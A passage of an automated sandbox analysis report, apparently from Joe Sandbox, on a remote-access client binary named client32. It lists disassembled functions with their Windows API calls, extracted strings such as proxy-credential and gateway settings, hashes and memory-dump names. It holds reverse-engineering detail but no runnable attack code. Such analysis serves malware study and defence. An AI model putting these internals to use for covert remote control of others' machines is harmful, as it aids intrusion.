                                                                                                                                                                                                    control_flow_graph 2281 11136060-11136077 2282 111364a2-111364b1 call 1115e4d1 2281->2282 2283 1113607d-11136084 2281->2283 2283->2282 2285 1113608a-11136091 2283->2285 2285->2282 2287 11136097-1113609e 2285->2287 2287->2282 2288 111360a4-111360ab 2287->2288 2288->2282 2289 111360b1-111360c1 call 11141710 2288->2289 2292 111360c3-111360ca 2289->2292 2293 111360d0-11136117 call 1105d340 call 11062d60 2289->2293 2292->2282 2292->2293 2298 11136125-1113614e call 111299f0 2293->2298 2299 11136119-11136120 2293->2299 2302 11136154-11136157 2298->2302 2303 1113620a-11136211 call 110e8150 2298->2303 2299->2298 2305 11136165 2302->2305 2306 11136159-1113615e 2302->2306 2310 11136213-1113622e call 1105d340 2303->2310 2311 11136230-1113623f PostMessageA 2303->2311 2309 1113616b-11136176 2305->2309 2306->2305 2308 11136160-11136163 2306->2308 2308->2309 2312 11136178 2309->2312 2313 1113617d-11136195 2309->2313 2310->2311 2315 11136245-1113624a 2310->2315 2311->2315 2312->2313 2320 111361f1-111361f8 2313->2320 2321 11136197-1113619d 2313->2321 2318 11136255-11136259 2315->2318 2319 1113624c-11136250 call 1110c270 2315->2319 2323 1113625b-11136263 2318->2323 2324 1113627d-111362a6 call 1112d530 call 111434d0 call 11129bf0 call 1115e091 2318->2324 2319->2318 2328 11136207 2320->2328 2329 111361fa-11136201 call 1112eba0 2320->2329 2325 1113619f-111361a4 2321->2325 2326 111361ec 2321->2326 2330 11136265-1113627b 2323->2330 2331 111362a9-111362b1 2323->2331 2324->2331 2325->2326 2332 111361a6-111361ab 2325->2332 2326->2320 2328->2303 2329->2328 2343 11136203 2329->2343 2330->2331 2334 111362b3-111362cd call 1115e091 call 1115e4d1 2331->2334 2335 111362ce-111362f4 call 1113f4f0 call 111434f0 SetWindowTextA 2331->2335 2332->2326 2339 111361ad-111361cf 2332->2339 2355 11136300-11136319 call 1115e091 * 2 2335->2355 2356 111362f6-111362fd call 11132620 2335->2356 2339->2326 2352 111361d1-111361e0 call 11142150 2339->2352 2343->2328 2365 111361e2-111361ea 2352->2365 2368 1113631b-1113631f 2355->2368 2369 1113635e-11136362 2355->2369 2356->2355 2365->2326 2365->2365 2372 11136333-1113633a 2368->2372 2373 11136321-11136331 call 11132620 2368->2373 2370 11136368-1113636a 2369->2370 2371 1113642c-1113642e 2369->2371 2378 1113638c-11136399 call 110f61e0 2370->2378 2379 1113636c-1113636e 2370->2379 2374 11136430-11136432 2371->2374 2375 1113644d-1113645a call 110f61e0 2371->2375 2376 11136354 2372->2376 2377 1113633c-11136351 call 1112e330 2372->2377 2373->2372 2373->2377 2383 11136443-1113644a call 1112e330 2374->2383 2384 11136434-1113643e call 11132620 2374->2384 2394 1113649f-111364a1 2375->2394 2398 1113645c-1113646c IsWindowVisible 2375->2398 2376->2369 2377->2376 2378->2394 2395 1113639f-111363b0 IsWindowVisible 2378->2395 2379->2378 2387 11136370-11136380 call 11132620 2379->2387 2383->2375 2384->2383 2387->2378 2402 11136382-11136389 call 1112e330 2387->2402 2394->2282 2395->2394 2400 111363b6-111363c6 call 11141710 2395->2400 2398->2394 2401 1113646e-11136479 IsWindowVisible 2398->2401 2400->2394 2409 111363cc-111363e4 GetForegroundWindow IsWindowVisible 2400->2409 2401->2394 2404 1113647b-1113649d EnableWindow call 1112e330 EnableWindow 2401->2404 2402->2378 2404->2394 2411 111363f1-111363fd call 1112e330 2409->2411 2412 111363e6-111363ef EnableWindow 2409->2412 2415 111363ff-11136405 2411->2415 2416 1113640e-1113642b EnableWindow call 1115e4d1 2411->2416 2412->2411 2415->2416 2417 11136407-11136408 SetForegroundWindow 2415->2417 2417->2416
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
                                                                                                                                                                                                      • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                                                                                      • Part of subcall function 11141710: _memset.LIBCMT ref: 1114179D
                                                                                                                                                                                                      • Part of subcall function 11141710: _strncpy.LIBCMT ref: 1114186A
                                                                                                                                                                                                    • PostMessageA.USER32(0007036E,000006CF,00000007,00000000), ref: 1113623F
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                    • SetWindowTextA.USER32(0007036E,00000000), ref: 111362E7
                                                                                                                                                                                                    • IsWindowVisible.USER32(0007036E), ref: 111363AC
                                                                                                                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 111363CC
                                                                                                                                                                                                    • IsWindowVisible.USER32(0007036E), ref: 111363DA
                                                                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 11136408
                                                                                                                                                                                                    • EnableWindow.USER32(0007036E,00000001), ref: 11136417
                                                                                                                                                                                                    • IsWindowVisible.USER32(0007036E), ref: 11136468
                                                                                                                                                                                                    • IsWindowVisible.USER32(0007036E), ref: 11136475
                                                                                                                                                                                                    • EnableWindow.USER32(0007036E,00000000), ref: 11136489
                                                                                                                                                                                                    • EnableWindow.USER32(0007036E,00000000), ref: 111363EF
                                                                                                                                                                                                      • Part of subcall function 1112E330: ShowWindow.USER32(0007036E,00000000,?,11136492,00000007,?,?,?,?,?,00000000,?,?,?,?,?), ref: 1112E354
                                                                                                                                                                                                    • EnableWindow.USER32(0007036E,00000001), ref: 1113649D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                                                                                                                                    • String ID: @r$Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                                                                                                                    • API String ID: 3453649892-2668506982
                                                                                                                                                                                                    • Opcode ID: 933d860dfa7abdf9aec1ce1cc807207ef57f020f96dc405baf31ced77d609c35
                                                                                                                                                                                                    • Instruction ID: e84f8c9860d0a84ca21d0dbcc5e0864e350968dbdf20df23b648977f69907e2d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 933d860dfa7abdf9aec1ce1cc807207ef57f020f96dc405baf31ced77d609c35
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02C13C75F113259BEB02DFE4CD85BAEF7A6AB8032DF104438D9159B288EB31E944C791
                                                                                                                                                                                                    Function 11105D40 Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 213libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                    • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 11105E29
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 11105E71
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 11105EDB
                                                                                                                                                                                                      • Part of subcall function 1110C2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001), ref: 1110C2C7
                                                                                                                                                                                                      • Part of subcall function 1110C2B0: CreateThread.KERNEL32(00000000,00000001,00000000,00000000,00000000,0000000C), ref: 1110C2EA
                                                                                                                                                                                                      • Part of subcall function 1110C2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C317
                                                                                                                                                                                                      • Part of subcall function 1110C2B0: CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C321
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 11105EEF
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 11105EFF
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000003C), ref: 11105F1B
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(111EC5C4), ref: 11105F26
                                                                                                                                                                                                      • Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
                                                                                                                                                                                                      • Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105F69
                                                                                                                                                                                                      • Part of subcall function 1109DCF0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
                                                                                                                                                                                                      • Part of subcall function 1109DCF0: OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
                                                                                                                                                                                                      • Part of subcall function 1109DCF0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105FBA
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 1110600F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_memsetwsprintf
                                                                                                                                                                                                    • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                                                                                                                                    • API String ID: 539809342-403456261
                                                                                                                                                                                                    • Opcode ID: b18508c46a18bbf34551defff19b016e4d08b159e6cc9be7a7aa41d6413da877
                                                                                                                                                                                                    • Instruction ID: 98d48469d2e7b61091a73167657919c28ab3cbb48a1ba220805b109c32019478
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b18508c46a18bbf34551defff19b016e4d08b159e6cc9be7a7aa41d6413da877
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6981B1B1E007569FDB51CFB48C89BAAFBE5BB08308F10857DE569D7280D7706A40CB12
                                                                                                                                                                                                    Function 685A33A0 Relevance: 29.1, APIs: 2, Strings: 17, Instructions: 571COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                                    • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247$r<Zh
                                                                                                                                                                                                    • API String ID: 2111968516-3873424096
                                                                                                                                                                                                    • Opcode ID: 5681b0e9510a602a87d8b9d493e70a331f209f5027bf97fd1cecacb1d035b689
                                                                                                                                                                                                    • Instruction ID: 33063267e8ada4de353dc1dea75aee9a45cf1d88fb422f9f4f127c992a54f939
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5681b0e9510a602a87d8b9d493e70a331f209f5027bf97fd1cecacb1d035b689
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D2272B6A00368AFDF21CF68CCC0EEEB7B9AB4A204F8485D9E559A7540D6315F84CF51
                                                                                                                                                                                                    Function 11030444 Relevance: 28.4, APIs: 11, Strings: 5, Instructions: 357libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 11030450
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 11030457
                                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 11030465
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00728D58,00001388), ref: 11030746
                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorModeObject$AddressExchangeHandleInfoInterlockedModuleNativeProcStockSystem
                                                                                                                                                                                                    • String ID: .%d$Error %s unloading audiocap dll$GetNativeSystemInfo$kernel32.dll$pcicl32
                                                                                                                                                                                                    • API String ID: 711497182-3782231422
                                                                                                                                                                                                    • Opcode ID: 106fb8bc483957a45cfa904f75695c57fc0a23e7e1dbb6dc441bbb2ace021997
                                                                                                                                                                                                    • Instruction ID: f63cb038d00ac44cf3594e94df0c2f2de2f1e5b42f8671348dba24db1a15b590
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 106fb8bc483957a45cfa904f75695c57fc0a23e7e1dbb6dc441bbb2ace021997
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59D172B0D16369DEDF02CBB48C447EDBEF5AB8430CF1001A6D849A7289F7755A84CB92
                                                                                                                                                                                                    Function 110302A9 Relevance: 28.4, APIs: 9, Strings: 7, Instructions: 350registryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,75BF8400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 110303C3
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00728D58,00001388), ref: 11030746
                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                                                                                                      • Part of subcall function 111601FD: __isdigit_l.LIBCMT ref: 11160222
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorModeObject$CloseExchangeInterlockedQueryStockValue__isdigit_l
                                                                                                                                                                                                    • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$pcicl32
                                                                                                                                                                                                    • API String ID: 3298063328-2190704750
                                                                                                                                                                                                    • Opcode ID: 0368fc6ba5d118a56a23de13d07dfbd221bb1150da24c248aa16321da6633758
                                                                                                                                                                                                    • Instruction ID: 9f43229105984b1126c86cbd82377d9c7f2924e853b9011d381d79a7883068f9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0368fc6ba5d118a56a23de13d07dfbd221bb1150da24c248aa16321da6633758
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0D1F8B0D163599FEB11CBA48C84BAEFBF5AB8430CF1041E9D449A7288FB715A44CB52
                                                                                                                                                                                                    Function 11084F50 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(PCIINV.DLL,24DE4E77,02626E50,02626E40,?,00000000,1117ED9C,000000FF,?,11031392,02626E50,00000000,?,?,?), ref: 11084F85
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                      • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11084FAB
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11084FBF
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11084FD3
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1108505B
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11085072
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11085089
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,11084DB0,00000001,00000000), ref: 110851DA
                                                                                                                                                                                                      • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,74DEF550,?,?,11085200,?,11031392,02626E50,00000000,?,?,?), ref: 11084BD8
                                                                                                                                                                                                      • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,74DEF550,?,?,11085200,?,11031392,02626E50,00000000,?,?,?), ref: 11084BEB
                                                                                                                                                                                                      • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,74DEF550,?,?,11085200,?,11031392,02626E50,00000000,?,?,?), ref: 11084BFE
                                                                                                                                                                                                      • Part of subcall function 11084BC0: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,11085200,?,11031392,02626E50,00000000,?,?,?), ref: 11084C11
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
